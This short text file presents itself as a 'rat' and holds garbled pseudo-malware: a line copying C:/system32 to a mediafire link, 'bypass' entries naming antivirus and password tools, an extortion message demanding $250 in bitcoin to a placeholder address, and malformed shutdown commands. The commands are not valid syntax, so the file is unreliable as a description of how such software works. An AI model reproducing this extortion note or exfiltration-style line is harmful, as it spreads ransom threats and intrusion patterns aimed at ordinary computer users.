this content is a rat, dont see please.


























































C:/system32 copy to https://mediafire.com/{}
bypass="Windows Defender"
bypass="Kaspersky"
bypass="BitWarden"
bypass="MalwareBytes"

message="you pc ratted lol gamingbr!!!! fire, i have acces total of your pc if you don't pay to me 250$ (dol) for me, i fuck your pc. send btc to account: AAABBBCCCDDDEEE333666696969CCCXXXZZZ"

shutdown -13
shutdown -1414
shutdown - loggon
ratted="pc"
